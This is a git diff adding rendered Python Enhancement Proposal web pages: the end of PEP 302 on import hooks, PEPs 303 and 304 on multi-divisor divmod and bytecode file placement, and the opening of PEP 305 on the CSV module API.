    +    return mod
    +
    +
    +
  • +
+
+
+

Specification part 2: Registering Hooks

+

There are two types of import hooks: Meta hooks and Path hooks. Meta +hooks are called at the start of import processing, before any other import +processing (so that meta hooks can override sys.path processing, frozen +modules, or even built-in modules). To register a meta hook, simply add the +finder object to sys.meta_path (the list of registered meta hooks).

+

Path hooks are called as part of sys.path (or package.__path__) +processing, at the point where their associated path item is encountered. A +path hook is registered by adding an importer factory to sys.path_hooks.

+

sys.path_hooks is a list of callables, which will be checked in sequence +to determine if they can handle a given path item. The callable is called +with one argument, the path item. The callable must raise ImportError if +it is unable to handle the path item, and return an importer object if it can +handle the path item. Note that if the callable returns an importer object +for a specific sys.path entry, the builtin import machinery will not be +invoked to handle that entry any longer, even if the importer object later +fails to find a specific module. The callable is typically the class of the +import hook, and hence the class __init__() method is called. (This is +also the reason why it should raise ImportError: an __init__() method +can’t return anything. This would be possible with a __new__() method in +a new style class, but we don’t want to require anything about how a hook is +implemented.)

+

The results of path hook checks are cached in sys.path_importer_cache, +which is a dictionary mapping path entries to importer objects. The cache is +checked before sys.path_hooks is scanned. If it is necessary to force a +rescan of sys.path_hooks, it is possible to manually clear all or part of +sys.path_importer_cache.

+

Just like sys.path itself, the new sys variables must have specific +types:

+
    +
  • sys.meta_path and sys.path_hooks must be Python lists.
  • +
  • sys.path_importer_cache must be a Python dict.
  • +
+

Modifying these variables in place is allowed, as is replacing them with new +objects.

+
+
+

Packages and the role of __path__

+

If a module has a __path__ attribute, the import mechanism will treat it +as a package. The __path__ variable is used instead of sys.path when +importing submodules of the package. The rules for sys.path therefore +also apply to pkg.__path__. So sys.path_hooks is also consulted when +pkg.__path__ is traversed. Meta importers don’t necessarily use +sys.path at all to do their work and may therefore ignore the value of +pkg.__path__. In this case it is still advised to set it to list, which +can be empty.

+
+
+

Optional Extensions to the Importer Protocol

+

The Importer Protocol defines three optional extensions. One is to retrieve +data files, the second is to support module packaging tools and/or tools that +analyze module dependencies (for example Freeze), while the last is to support +execution of modules as scripts. The latter two categories of tools usually +don’t actually load modules, they only need to know if and where they are +available. All three extensions are highly recommended for general purpose +importers, but may safely be left out if those features aren’t needed.

+

To retrieve the data for arbitrary “files” from the underlying storage +backend, loader objects may supply a method named get_data():

+
loader.get_data(path)
+
+
+

This method returns the data as a string, or raise IOError if the “file” +wasn’t found. The data is always returned as if “binary” mode was used - +there is no CRLF translation of text files, for example. It is meant for +importers that have some file-system-like properties. The ‘path’ argument is +a path that can be constructed by munging module.__file__ (or +pkg.__path__ items) with the os.path.* functions, for example:

+
d = os.path.dirname(__file__)
+data = __loader__.get_data(os.path.join(d, "logo.gif"))
+
+
+

The following set of methods may be implemented if support for (for example) +Freeze-like tools is desirable. It consists of three additional methods +which, to make it easier for the caller, each of which should be implemented, +or none at all:

+
loader.is_package(fullname)
+loader.get_code(fullname)
+loader.get_source(fullname)
+
+
+

All three methods should raise ImportError if the module wasn’t found.

+

The loader.is_package(fullname) method should return True if the +module specified by ‘fullname’ is a package and False if it isn’t.

+

The loader.get_code(fullname) method should return the code object +associated with the module, or None if it’s a built-in or extension +module. If the loader doesn’t have the code object but it does have the +source code, it should return the compiled source code. (This is so that our +caller doesn’t also need to check get_source() if all it needs is the code +object.)

+

The loader.get_source(fullname) method should return the source code for +the module as a string (using newline characters for line endings) or None +if the source is not available (yet it should still raise ImportError if +the module can’t be found by the importer at all).

+

To support execution of modules as scripts (PEP 338), +the above three methods for +finding the code associated with a module must be implemented. In addition to +those methods, the following method may be provided in order to allow the +runpy module to correctly set the __file__ attribute:

+
loader.get_filename(fullname)
+
+
+

This method should return the value that __file__ would be set to if the +named module was loaded. If the module is not found, then ImportError +should be raised.

+
+
+

Integration with the ‘imp’ module

+

The new import hooks are not easily integrated in the existing +imp.find_module() and imp.load_module() calls. It’s questionable +whether it’s possible at all without breaking code; it is better to simply add +a new function to the imp module. The meaning of the existing +imp.find_module() and imp.load_module() calls changes from: “they +expose the built-in import mechanism” to “they expose the basic unhooked +built-in import mechanism”. They simply won’t invoke any import hooks. A new +imp module function is proposed (but not yet implemented) under the name +get_loader(), which is used as in the following pattern:

+
loader = imp.get_loader(fullname, path)
+if loader is not None:
+    loader.load_module(fullname)
+
+
+

In the case of a “basic” import, one the imp.find_module() function would +handle, the loader object would be a wrapper for the current output of +imp.find_module(), and loader.load_module() would call +imp.load_module() with that output.

+

Note that this wrapper is currently not yet implemented, although a Python +prototype exists in the test_importhooks.py script (the ImpWrapper +class) included with the patch.

+
+
+

Forward Compatibility

+

Existing __import__ hooks will not invoke new-style hooks by magic, unless +they call the original __import__ function as a fallback. For example, +ihooks.py, iu.py and imputil.py are in this sense not forward +compatible with this PEP.

+
+
+

Open Issues

+

Modules often need supporting data files to do their job, particularly in the +case of complex packages or full applications. Current practice is generally +to locate such files via sys.path (or a package.__path__ attribute). +This approach will not work, in general, for modules loaded via an import +hook.

+

There are a number of possible ways to address this problem:

+
    +
  • “Don’t do that”. If a package needs to locate data files via its +__path__, it is not suitable for loading via an import hook. The +package can still be located on a directory in sys.path, as at present, +so this should not be seen as a major issue.
  • +
  • Locate data files from a standard location, rather than relative to the +module file. A relatively simple approach (which is supported by +distutils) would be to locate data files based on sys.prefix (or +sys.exec_prefix). For example, looking in +os.path.join(sys.prefix, "data", package_name).
  • +
  • Import hooks could offer a standard way of getting at data files relative +to the module file. The standard zipimport object provides a method +get_data(name) which returns the content of the “file” called name, +as a string. To allow modules to get at the importer object, zipimport +also adds an attribute __loader__ to the module, containing the +zipimport object used to load the module. If such an approach is used, +it is important that client code takes care not to break if the +get_data() method is not available, so it is not clear that this +approach offers a general answer to the problem.
  • +
+

It was suggested on python-dev that it would be useful to be able to receive a +list of available modules from an importer and/or a list of available data +files for use with the get_data() method. The protocol could grow two +additional extensions, say list_modules() and list_files(). The +latter makes sense on loader objects with a get_data() method. However, +it’s a bit unclear which object should implement list_modules(): the +importer or the loader or both?

+

This PEP is biased towards loading modules from alternative places: it +currently doesn’t offer dedicated solutions for loading modules from +alternative file formats or with alternative compilers. In contrast, the +ihooks module from the standard library does have a fairly straightforward +way to do this. The Quixote project [7] uses this technique to import PTL +files as if they are ordinary Python modules. To do the same with the new +hooks would either mean to add a new module implementing a subset of +ihooks as a new-style importer, or add a hookable built-in path importer +object.

+

There is no specific support within this PEP for “stacking” hooks. For +example, it is not obvious how to write a hook to load modules from tar.gz +files by combining separate hooks to load modules from .tar and .gz +files. However, there is no support for such stacking in the existing hook +mechanisms (either the basic “replace __import__” method, or any of the +existing import hook modules) and so this functionality is not an obvious +requirement of the new mechanism. It may be worth considering as a future +enhancement, however.

+

It is possible (via sys.meta_path) to add hooks which run before +sys.path is processed. However, there is no equivalent way of adding +hooks to run after sys.path is processed. For now, if a hook is required +after sys.path has been processed, it can be simulated by adding an +arbitrary “cookie” string at the end of sys.path, and having the required +hook associated with this cookie, via the normal sys.path_hooks +processing. In the longer term, the path handling code will become a “real” +hook on sys.meta_path, and at that stage it will be possible to insert +user-defined hooks either before or after it.

+
+
+

Implementation

+

The PEP 302 implementation has been integrated with Python as of 2.3a1. An +earlier version is available as patch #652586 [9], but more interestingly, +the issue contains a fairly detailed history of the development and design.

+

PEP 273 has been implemented using PEP 302’s import hooks.

+
+
+

References and Footnotes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0302.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0303/index.html b/pep-0303/index.html new file mode 100644 index 00000000000..7a44f99eb98 --- /dev/null +++ b/pep-0303/index.html @@ -0,0 +1,310 @@ + + + + + + + + PEP 303 – Extend divmod() for Multiple Divisors | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 303 – Extend divmod() for Multiple Divisors

+
+
Author:
+
Thomas Bellman <bellman+pep-divmod at lysator.liu.se>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
31-Dec-2002
+
Python-Version:
+
2.3
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes an extension to the built-in divmod() function, +allowing it to take multiple divisors, chaining several calls to +divmod() into one.

+
+
+

Pronouncement

+

This PEP is rejected. Most uses for chained divmod() involve a +constant modulus (in radix conversions for example) and are more +properly coded as a loop. The example of splitting seconds +into days/hours/minutes/seconds does not generalize to months +and years; rather, the whole use case is handled more flexibly and +robustly by date and time modules. The other use cases mentioned +in the PEP are somewhat rare in real code. The proposal is also +problematic in terms of clarity and obviousness. In the examples, +it is not immediately clear that the argument order is correct or +that the target tuple is of the right length. Users from other +languages are more likely to understand the standard two argument +form without having to re-read the documentation. See python-dev +discussion on 17 June 2005 [1].

+
+
+

Specification

+

The built-in divmod() function would be changed to accept multiple +divisors, changing its signature from divmod(dividend, divisor) to +divmod(dividend, *divisors). The dividend is divided by the last +divisor, giving a quotient and a remainder. The quotient is then +divided by the second to last divisor, giving a new quotient and +remainder. This is repeated until all divisors have been used, +and divmod() then returns a tuple consisting of the quotient from +the last step, and the remainders from all the steps.

+

A Python implementation of the new divmod() behaviour could look +like:

+
def divmod(dividend, *divisors):
+    modulos = ()
+    q = dividend
+    while divisors:
+        q, r = q.__divmod__(divisors[-1])
+        modulos = (r,) + modulos
+        divisors = divisors[:-1]
+    return (q,) + modulos
+
+
+
+
+

Motivation

+

Occasionally one wants to perform a chain of divmod() operations, +calling divmod() on the quotient from the previous step, with +varying divisors. The most common case is probably converting a +number of seconds into weeks, days, hours, minutes and seconds. +This would today be written as:

+
def secs_to_wdhms(seconds):
+    m, s = divmod(seconds, 60)
+    h, m = divmod(m, 60)
+    d, h = divmod(h, 24)
+    w, d = divmod(d, 7)
+    return (w, d, h, m, s)
+
+
+

This is tedious and easy to get wrong each time you need it.

+

If instead the divmod() built-in is changed according the proposal, +the code for converting seconds to weeks, days, hours, minutes and +seconds then become

+
def secs_to_wdhms(seconds):
+    w, d, h, m, s = divmod(seconds, 7, 24, 60, 60)
+    return (w, d, h, m, s)
+
+
+

which is easier to type, easier to type correctly, and easier to +read.

+

Other applications are:

+
    +
  • Astronomical angles (declination is measured in degrees, minutes +and seconds, right ascension is measured in hours, minutes and +seconds).
  • +
  • Old British currency (1 pound = 20 shilling, 1 shilling = 12 pence).
  • +
  • Anglo-Saxon length units: 1 mile = 1760 yards, 1 yard = 3 feet, +1 foot = 12 inches.
  • +
  • Anglo-Saxon weight units: 1 long ton = 160 stone, 1 stone = 14 +pounds, 1 pound = 16 ounce, 1 ounce = 16 dram.
  • +
  • British volumes: 1 gallon = 4 quart, 1 quart = 2 pint, 1 pint += 20 fluid ounces.
  • +
+
+
+

Rationale

+

The idea comes from APL, which has an operator that does this. (I +don’t remember what the operator looks like, and it would probably +be impossible to render in ASCII anyway.)

+

The APL operator takes a list as its second operand, while this +PEP proposes that each divisor should be a separate argument to +the divmod() function. This is mainly because it is expected that +the most common uses will have the divisors as constants right in +the call (as the 7, 24, 60, 60 above), and adding a set of +parentheses or brackets would just clutter the call.

+

Requiring an explicit sequence as the second argument to divmod() +would seriously break backwards compatibility. Making divmod() +check its second argument for being a sequence is deemed to be too +ugly to contemplate. And in the case where one does have a +sequence that is computed other-where, it is easy enough to write +divmod(x, *divs) instead.

+

Requiring at least one divisor, i.e rejecting divmod(x), has been +considered, but no good reason to do so has come to mind, and is +thus allowed in the name of generality.

+

Calling divmod() with no divisors should still return a tuple (of +one element). Code that calls divmod() with a varying number of +divisors, and thus gets a return value with an “unknown” number of +elements, would otherwise have to special case that case. Code +that knows it is calling divmod() with no divisors is considered +to be too silly to warrant a special case.

+

Processing the divisors in the other direction, i.e dividing with +the first divisor first, instead of dividing with the last divisor +first, has been considered. However, the result comes with the +most significant part first and the least significant part last +(think of the chained divmod as a way of splitting a number into +“digits”, with varying weights), and it is reasonable to specify +the divisors (weights) in the same order as the result.

+

The inverse operation:

+
def inverse_divmod(seq, *factors):
+    product = seq[0]
+    for x, y in zip(factors, seq[1:]):
+        product = product * x + y
+    return product
+
+
+

could also be useful. However, writing

+
seconds = (((((w * 7) + d) * 24 + h) * 60 + m) * 60 + s)
+
+
+

is less cumbersome both to write and to read than the chained +divmods. It is therefore deemed to be less important, and its +introduction can be deferred to its own PEP. Also, such a +function needs a good name, and the PEP author has not managed to +come up with one yet.

+

Calling divmod("spam") does not raise an error, despite strings +supporting neither division nor modulo. However, unless we know +the other object too, we can’t determine whether divmod() would +work or not, and thus it seems silly to forbid it.

+
+
+

Backwards Compatibility

+

Any module that replaces the divmod() function in the __builtin__ +module, may cause other modules using the new syntax to break. It +is expected that this is very uncommon.

+

Code that expects a TypeError exception when calling divmod() with +anything but two arguments will break. This is also expected to +be very uncommon.

+

No other issues regarding backwards compatibility are known.

+
+
+

Reference Implementation

+

Not finished yet, but it seems a rather straightforward +new implementation of the function builtin_divmod() in +Python/bltinmodule.c.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0303.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0304/index.html b/pep-0304/index.html new file mode 100644 index 00000000000..c53a4a09189 --- /dev/null +++ b/pep-0304/index.html @@ -0,0 +1,460 @@ + + + + + + + + PEP 304 – Controlling Generation of Bytecode Files | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 304 – Controlling Generation of Bytecode Files

+
+
Author:
+
Skip Montanaro
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
22-Jan-2003
+
Post-History:
+
27-Jan-2003, 31-Jan-2003, 17-Jun-2005
+
+
+
+
Table of Contents +
+
+

Historical Note

+

While this original PEP was withdrawn, a variant of this feature +was eventually implemented for Python 3.8 in https://bugs.python.org/issue33499

+

Several of the issues and concerns originally raised in this PEP were resolved +by other changes in the intervening years:

+
    +
  • the introduction of isolated mode to handle potential security concerns
  • +
  • the switch to importlib, a fully import-hook based import system implementation
  • +
  • PEP 3147’s change in the bytecode cache layout to use __pycache__ +subdirectories, including the source_to_cache(path) and +cache_to_source(path) APIs that allow the interpreter to automatically +handle the redirection to a separate cache directory
  • +
+
+
+

Abstract

+

This PEP outlines a mechanism for controlling the generation and +location of compiled Python bytecode files. This idea originally +arose as a patch request [1] and evolved into a discussion thread on +the python-dev mailing list [2]. The introduction of an environment +variable will allow people installing Python or Python-based +third-party packages to control whether or not bytecode files should +be generated at installation time, and if so, where they should be +written. It will also allow users to control whether or not bytecode +files should be generated at application run-time, and if so, where +they should be written.

+
+
+

Proposal

+

Add a new environment variable, PYTHONBYTECODEBASE, to the mix of +environment variables which Python understands. PYTHONBYTECODEBASE is +interpreted as follows:

+
    +
  • If not defined, Python bytecode is generated in exactly the same way +as is currently done. sys.bytecodebase is set to the root directory +(either / on Unix and Mac OSX or the root directory of the startup +(installation???) drive – typically C:\ – on Windows).
  • +
  • If defined and it refers to an existing directory to which the user +has write permission, sys.bytecodebase is set to that directory and +bytecode files are written into a directory structure rooted at that +location.
  • +
  • If defined but empty, sys.bytecodebase is set to None and generation +of bytecode files is suppressed altogether.
  • +
  • If defined and one of the following is true:
      +
    • it does not refer to a directory,
    • +
    • it refers to a directory, but not one for which the user has write +permission
    • +
    +

    a warning is displayed, sys.bytecodebase is set to None and +generation of bytecode files is suppressed altogether.

    +
  • +
+

After startup initialization, all runtime references are to +sys.bytecodebase, not the PYTHONBYTECODEBASE environment variable. +sys.path is not modified.

+

From the above, we see sys.bytecodebase can only take on two valid +types of values: None or a string referring to a valid directory on +the system.

+

During import, this extension works as follows:

+
    +
  • The normal search for a module is conducted. The search order is +roughly: dynamically loaded extension module, Python source file, +Python bytecode file. The only time this mechanism comes into play +is if a Python source file is found.
  • +
  • Once we’ve found a source module, an attempt to read a byte-compiled +file in the same directory is made. (This is the same as before.)
  • +
  • If no byte-compiled file is found, an attempt to read a +byte-compiled file from the augmented directory is made.
  • +
  • If bytecode generation is required, the generated bytecode is written +to the augmented directory if possible.
  • +
+

Note that this PEP is explicitly not about providing +module-by-module or directory-by-directory control over the +disposition of bytecode files.

+
+

Glossary

+
    +
  • “bytecode base” refers to the current setting of +sys.bytecodebase.
  • +
  • “augmented directory” refers to the directory formed from the +bytecode base and the directory name of the source file.
  • +
  • PYTHONBYTECODEBASE refers to the environment variable when necessary +to distinguish it from “bytecode base”.
  • +
+
+
+

Locating bytecode files

+

When the interpreter is searching for a module, it will use sys.path +as usual. However, when a possible bytecode file is considered, an +extra probe for a bytecode file may be made. First, a check is made +for the bytecode file using the directory in sys.path which holds the +source file (the current behavior). If a valid bytecode file is not +found there (either one does not exist or exists but is out-of-date) +and the bytecode base is not None, a second probe is made using the +directory in sys.path prefixed appropriately by the bytecode base.

+
+
+

Writing bytecode files

+

When the bytecode base is not None, a new bytecode file is written to +the appropriate augmented directory, never directly to a directory in +sys.path.

+
+
+

Defining augmented directories

+

Conceptually, the augmented directory for a bytecode file is the +directory in which the source file exists prefixed by the bytecode +base. In a Unix environment this would be:

+
pcb = os.path.abspath(sys.bytecodebase)
+if sourcefile[0] == os.sep: sourcefile = sourcefile[1:]
+augdir = os.path.join(pcb, os.path.dirname(sourcefile))
+
+
+

On Windows, which does not have a single-rooted directory tree, the +drive letter of the directory containing the source file is treated as +a directory component after removing the trailing colon. The +augmented directory is thus derived as

+
pcb = os.path.abspath(sys.bytecodebase)
+drive, base = os.path.splitdrive(os.path.dirname(sourcefile))
+drive = drive[:-1]
+if base[0] == "\\": base = base[1:]
+augdir = os.path.join(pcb, drive, base)
+
+
+
+
+

Fixing the location of the bytecode base

+

During program startup, the value of the PYTHONBYTECODEBASE +environment variable is made absolute, checked for validity and added +to the sys module, effectively:

+
pcb = os.path.abspath(os.environ["PYTHONBYTECODEBASE"])
+probe = os.path.join(pcb, "foo")
+try:
+    open(probe, "w")
+except IOError:
+    sys.bytecodebase = None
+else:
+    os.unlink(probe)
+    sys.bytecodebase = pcb
+
+
+

This allows the user to specify the bytecode base as a relative path, +but not have it subject to changes to the current working directory +during program execution. (I can’t imagine you’d want it to move +around during program execution.)

+

There is nothing special about sys.bytecodebase. The user may change +it at runtime if desired, but normally it will not be modified.

+
+
+
+

Rationale

+

In many environments it is not possible for non-root users to write +into directories containing Python source files. Most of the time, +this is not a problem as Python source is generally byte compiled +during installation. However, there are situations where bytecode +files are either missing or need to be updated. If the directory +containing the source file is not writable by the current user a +performance penalty is incurred each time a program importing the +module is run. [3] Warning messages may also be generated in certain +circumstances. If the directory is writable, nearly simultaneous +attempts to write the bytecode file by two separate processes +may occur, resulting in file corruption. [4]

+

In environments with RAM disks available, it may be desirable for +performance reasons to write bytecode files to a directory on such a +disk. Similarly, in environments where Python source code resides on +network file systems, it may be desirable to cache bytecode files on +local disks.

+
+
+

Alternatives

+

The only other alternative proposed so far [1] seems to be to add a +-R flag to the interpreter to disable writing bytecode files +altogether. This proposal subsumes that. Adding a command-line +option is certainly possible, but is probably not sufficient, as the +interpreter’s command line is not readily available during +installation (early during program startup???).

+
+
+

Issues

+
    +
  • Interpretation of a module’s __file__ attribute. I believe the +__file__ attribute of a module should reflect the true location of +the bytecode file. If people want to locate a module’s source code, +they should use imp.find_module(module).
  • +
  • Security - What if root has PYTHONBYTECODEBASE set? Yes, this can +present a security risk, but so can many other things the root user +does. The root user should probably not set PYTHONBYTECODEBASE +except possibly during installation. Still, perhaps this problem +can be minimized. When running as root the interpreter should check +to see if PYTHONBYTECODEBASE refers to a directory which is writable +by anyone other than root. If so, it could raise an exception or +warning and set sys.bytecodebase to None. Or, see the next item.
  • +
  • More security - What if PYTHONBYTECODEBASE refers to a general +directory (say, /tmp)? In this case, perhaps loading of a +preexisting bytecode file should occur only if the file is owned by +the current user or root. (Does this matter on Windows?)
  • +
  • The interaction of this PEP with import hooks has not been +considered yet. In fact, the best way to implement this idea might +be as an import hook. See PEP 302.
  • +
  • In the current (pre-PEP 304) environment, it is safe to delete a +source file after the corresponding bytecode file has been created, +since they reside in the same directory. With PEP 304 as currently +defined, this is not the case. A bytecode file in the augmented +directory is only considered when the source file is present and it +thus never considered when looking for module files ending in +“.pyc”. I think this behavior may have to change.
  • +
+
+
+

Examples

+

In the examples which follow, the urllib source code resides in +/usr/lib/python2.3/urllib.py and /usr/lib/python2.3 is in sys.path but +is not writable by the current user.

+
    +
  • The bytecode base is /tmp. /usr/lib/python2.3/urllib.pyc exists and +is valid. When urllib is imported, the contents of +/usr/lib/python2.3/urllib.pyc are used. The augmented directory is +not consulted. No other bytecode file is generated.
  • +
  • The bytecode base is /tmp. /usr/lib/python2.3/urllib.pyc exists, +but is out-of-date. When urllib is imported, the generated bytecode +file is written to urllib.pyc in the augmented directory which has +the value /tmp/usr/lib/python2.3. Intermediate directories will be +created as needed.
  • +
  • The bytecode base is None. No urllib.pyc file is found. When +urllib is imported, no bytecode file is written.
  • +
  • The bytecode base is /tmp. No urllib.pyc file is found. When +urllib is imported, the generated bytecode file is written to the +augmented directory which has the value /tmp/usr/lib/python2.3. +Intermediate directories will be created as needed.
  • +
  • At startup, PYTHONBYTECODEBASE is /tmp/foobar, which does not exist. +A warning is emitted, sys.bytecodebase is set to None and no +bytecode files are written during program execution unless +sys.bytecodebase is later changed to refer to a valid, +writable directory.
  • +
  • At startup, PYTHONBYTECODEBASE is set to /, which exists, but is not +writable by the current user. A warning is emitted, +sys.bytecodebase is set to None and no bytecode files are +written during program execution unless sys.bytecodebase is +later changed to refer to a valid, writable directory. Note that +even though the augmented directory constructed for a particular +bytecode file may be writable by the current user, what counts is +that the bytecode base directory itself is writable.
  • +
  • At startup PYTHONBYTECODEBASE is set to the empty string. +sys.bytecodebase is set to None. No warning is generated, however. +If no urllib.pyc file is found when urllib is imported, no bytecode +file is written.
  • +
+

In the Windows examples which follow, the urllib source code resides +in C:\PYTHON22\urllib.py. C:\PYTHON22 is in sys.path but is +not writable by the current user.

+
    +
  • The bytecode base is set to C:\TEMP. C:\PYTHON22\urllib.pyc +exists and is valid. When urllib is imported, the contents of +C:\PYTHON22\urllib.pyc are used. The augmented directory is not +consulted.
  • +
  • The bytecode base is set to C:\TEMP. C:\PYTHON22\urllib.pyc +exists, but is out-of-date. When urllib is imported, a new bytecode +file is written to the augmented directory which has the value +C:\TEMP\C\PYTHON22. Intermediate directories will be created as +needed.
  • +
  • At startup PYTHONBYTECODEBASE is set to TEMP and the current +working directory at application startup is H:\NET. The +potential bytecode base is thus H:\NET\TEMP. If this directory +exists and is writable by the current user, sys.bytecodebase will be +set to that value. If not, a warning will be emitted and +sys.bytecodebase will be set to None.
  • +
  • The bytecode base is C:\TEMP. No urllib.pyc file is found. +When urllib is imported, the generated bytecode file is written to +the augmented directory which has the value C:\TEMP\C\PYTHON22. +Intermediate directories will be created as needed.
  • +
+
+
+

Implementation

+

See the patch on Sourceforge. [6]

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0304.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0305/index.html b/pep-0305/index.html new file mode 100644 index 00000000000..da49c95978c --- /dev/null +++ b/pep-0305/index.html @@ -0,0 +1,509 @@ + + + + + + + + PEP 305 – CSV File API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 305 – CSV File API

+
+
Author:
+
Kevin Altis <altis at semi-retired.com>, +Dave Cole <djc at object-craft.com.au>, +Andrew McNamara <andrewm at object-craft.com.au>, +Skip Montanaro <skip at pobox.com>, +Cliff Wells <LogiplexSoftware at earthlink.net>
+
Discussions-To:
+
Csv list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Jan-2003
+
Python-Version:
+
2.3
+
Post-History:
+
31-Jan-2003, 13-Feb-2003
+
+
+
+
Table of Contents +
+
+

Abstract

+

The Comma Separated Values (CSV) file format is the most common import +and export format for spreadsheets and databases. Although many CSV +files are simple to parse, the format is not formally defined by a +stable specification and is subtle enough that parsing lines of a CSV +file with something like line.split(",") is eventually bound to +fail. This PEP defines an API for reading and writing CSV files. It +is accompanied by a corresponding module which implements the API.

+
+
+

To Do (Notes for the Interested and Ambitious)

+ +
+
+

Application Domain

+

This PEP is about doing one thing well: parsing tabular data which may +use a variety of field separators, quoting characters, quote escape +mechanisms and line endings. The authors intend the proposed module +to solve this one parsing problem efficiently. The authors do not +intend to address any of these related topics:

+
    +
  • data interpretation (is a field containing the string “10” supposed +to be a string, a float or an int? is it a number in base 10, base +16 or base 2? is a number in quotes a number or a string?)
  • +
  • locale-specific data representation (should the number 1.23 be +written as “1.23” or “1,23” or “1 23”?) – this may eventually be +addressed.
  • +
  • fixed width tabular data - can already be parsed reliably.
  • +
+
+
+

Rationale

+

Often, CSV files are formatted simply enough that you can get by +reading them line-by-line and splitting on the commas which delimit +the fields. This is especially true if all the data being read is +numeric. This approach may work for a while, then come back to bite +you in the butt when somebody puts something unexpected in the data +like a comma. As you dig into the problem you may eventually come to +the conclusion that you can solve the problem using regular +expressions. This will work for a while, then break mysteriously one +day. The problem grows, so you dig deeper and eventually realize that +you need a purpose-built parser for the format.

+

CSV formats are not well-defined and different implementations have a +number of subtle corner cases. It has been suggested that the “V” in +the acronym stands for “Vague” instead of “Values”. Different +delimiters and quoting characters are just the start. Some programs +generate whitespace after each delimiter which is not part of the +following field. Others quote embedded quoting characters by doubling +them, others by prefixing them with an escape character. The list of +weird ways to do things can seem endless.

+

All this variability means it is difficult for programmers to reliably +parse CSV files from many sources or generate CSV files designed to be +fed to specific external programs without a thorough understanding of +those sources and programs. This PEP and the software which accompany +it attempt to make the process less fragile.

+
+
+

Existing Modules

+

This problem has been tackled before. At least three modules +currently available in the Python community enable programmers to read +and write CSV files:

+
    +
  • Object Craft’s CSV module [2]
  • +
  • Cliff Wells’ Python-DSV module [3]
  • +
  • Laurence Tratt’s ASV module [4]
  • +
+

Each has a different API, making it somewhat difficult for programmers +to switch between them. More of a problem may be that they interpret +some of the CSV corner cases differently, so even after surmounting +the differences between the different module APIs, the programmer has +to also deal with semantic differences between the packages.

+
+
+

Module Interface

+

This PEP supports three basic APIs, one to read and parse CSV files, +one to write them, and one to identify different CSV dialects to the +readers and writers.

+
+

Reading CSV Files

+

CSV readers are created with the reader factory function:

+
obj = reader(iterable [, dialect='excel']
+             [optional keyword args])
+
+
+

A reader object is an iterator which takes an iterable object +returning lines as the sole required parameter. If it supports a +binary mode (file objects do), the iterable argument to the reader +function must have been opened in binary mode. This gives the reader +object full control over the interpretation of the file’s contents. +The optional dialect parameter is discussed below. The reader +function also accepts several optional keyword arguments which define +specific format settings for the parser (see the section “Formatting +Parameters”). Readers are typically used as follows:

+
csvreader = csv.reader(file("some.csv"))
+for row in csvreader:
+    process(row)
+
+
+

Each row returned by a reader object is a list of strings or Unicode +objects.

+

When both a dialect parameter and individual formatting parameters are +passed to the constructor, first the dialect is queried for formatting +parameters, then individual formatting parameters are examined.

+
+
+

Writing CSV Files

+

Creating writers is similar:

+
obj = writer(fileobj [, dialect='excel'],
+             [optional keyword args])
+
+
+

A writer object is a wrapper around a file-like object opened for +writing in binary mode (if such a distinction is made). It accepts +the same optional keyword parameters as the reader constructor.

+

Writers are typically used as follows:

+
csvwriter = csv.writer(file("some.csv", "w"))
+for row in someiterable:
+    csvwriter.writerow(row)
+
+
+

To generate a set of field names as the first row of the CSV file, the +programmer must explicitly write it, e.g.:

+
csvwriter = csv.writer(file("some.csv", "w"), fieldnames=names)
+csvwriter.write(names)
+for row in someiterable:
+    csvwriter.write(row)
+
+
+

or arrange for it to be the first row in the iterable being written.

+
+
+

Managing Different Dialects

+

Because CSV is a somewhat ill-defined format, there are plenty of ways +one CSV file can differ from another, yet contain exactly the same +data. Many tools which can import or export tabular data allow the +user to indicate the field delimiter, quote character, line +terminator, and other characteristics of the file. These can be +fairly easily determined, but are still mildly annoying to figure out, +and make for fairly long function calls when specified individually.

+

To try and minimize the difficulty of figuring out and specifying a +bunch of formatting parameters, reader and writer objects support a +dialect argument which is just a convenient handle on a group of these +lower level parameters. When a dialect is given as a string it +identifies one of the dialects known to the module via its +registration functions, otherwise it must be an instance of the +Dialect class as described below.

+

Dialects will generally be named after applications or organizations +which define specific sets of format constraints. Two dialects are +defined in the module as of this writing, “excel”, which describes the +default format constraints for CSV file export by Excel 97 and Excel +2000, and “excel-tab”, which is the same as “excel” but specifies an +ASCII TAB character as the field delimiter.

+

Dialects are implemented as attribute only classes to enable users to +construct variant dialects by subclassing. The “excel” dialect is a +subclass of Dialect and is defined as follows:

+
class Dialect:
+    # placeholders
+    delimiter = None
+    quotechar = None
+    escapechar = None
+    doublequote = None
+    skipinitialspace = None
+    lineterminator = None
+    quoting = None
+
+class excel(Dialect):
+    delimiter = ','
+    quotechar = '"'
+    doublequote = True
+    skipinitialspace = False
+    lineterminator = '\r\n'
+    quoting = QUOTE_MINIMAL
+
+
+

The “excel-tab” dialect is defined as:

+
class exceltsv(excel):
+    delimiter = '\t'
+
+
+

(For a description of the individual formatting parameters see the +section “Formatting Parameters”.)

+

To enable string references to specific dialects, the module defines +several functions:

+
dialect = get_dialect(name)
+names = list_dialects()
+register_dialect(name, dialect)
+unregister_dialect(name)
+
+
+

